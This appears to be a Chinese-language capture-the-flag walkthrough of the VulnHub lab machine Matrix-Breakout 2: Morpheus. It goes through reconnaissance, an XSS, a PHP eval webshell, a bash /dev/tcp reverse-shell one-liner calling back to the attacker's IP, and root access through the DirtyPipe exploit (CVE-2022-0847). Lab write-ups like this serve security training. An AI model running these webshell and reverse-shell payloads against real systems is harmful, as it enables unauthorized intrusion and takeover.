• 前言
  靶机：MATRIX-BREAKOUT: 2 MORPHEUS
  下载地址：https://www.vulnhub.com/entry/matrix-breakout-2-morpheus,757/
  难度：Medium-Hard
  攻击机：Kali 2020.4
  攻击机IP：192.168.88.129
  网络模式：NAT

• 信息收集

• 确定靶机IP
  arp-scan -l
  确定靶机ip为：192.168.88.130。
  

• 扫描开放端口
  nmap -p- 192.168.88.130
  开放了端口：22、80、81
  
  80端口是一个网页，没什么可用信息。
  
  81端口是一个登录窗口，有点像Tomcat登录窗口，试了几个常见的弱口令没登进去。
  

• 扫描目录
  使用Kali自带的dirbuster，目录字典是用的是directory-list-2.3-small.txt，发现了如下目录。
  

• 渗透过程

目录一一打开，在graffiti.php页面发现了有个提交窗口。

提交内容会在页面上显示，试了xss，果然可以弹窗。

尝试写入webshell，先试试<?php eval(@$_POST['cmd']); ?>,写进去没回显没法连接。抓包看，发现是写入到一个叫graffiti.txt。

可以通过URLhttp://192.168.88.130/graffiti.txt访问。

那么我们可以尝试写入到可执行文件test.php中。

使用webshell管理工具蚁剑连接，连接成功。

在根目录下发现FLAG.txt。

内容大概意思是有个用户Cypher, 还有张图片/.cypher-neo.png可能有用。

先把图片下载下来。

继续翻文件，果然在home文件下发现了Cypher用户文件夹，但是没有权限。

另一个用户文件夹thrinity可以打开，但是不知道有啥用。

上传反弹shell到test.php，开启监听，再访问test.php，在Kali里获得webshell。
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.88.129/9999 0>&1'");?>

也可以直接使用蚁剑的终端。

使用su、sudo -i提权失败。

再来研究研究图片cypher-neo.png，使用Kali自带工具图片分析工具binwalk，发现图片含有一个zip包。

提取文件后，得到两个文件，一个为空，另一个打开都不知道咋打开，遂弃。

再看看有啥用户，除了home下提示的两个也没别的了。

再看下系统内核版本，发现是5.x，可以使用DirtyPipe漏洞（CVE-2022-0847）进行提权。

下载exp，https://gitcode.net/mirrors/r1is/CVE-2022-0847/-/blob/main/Dirty-Pipe.sh， 在蚁剑中上传。

设置Dirty-Pipe.sh权限后，再执行，直接提权成功。

在根目录下找到第二个flag，至此渗透完毕！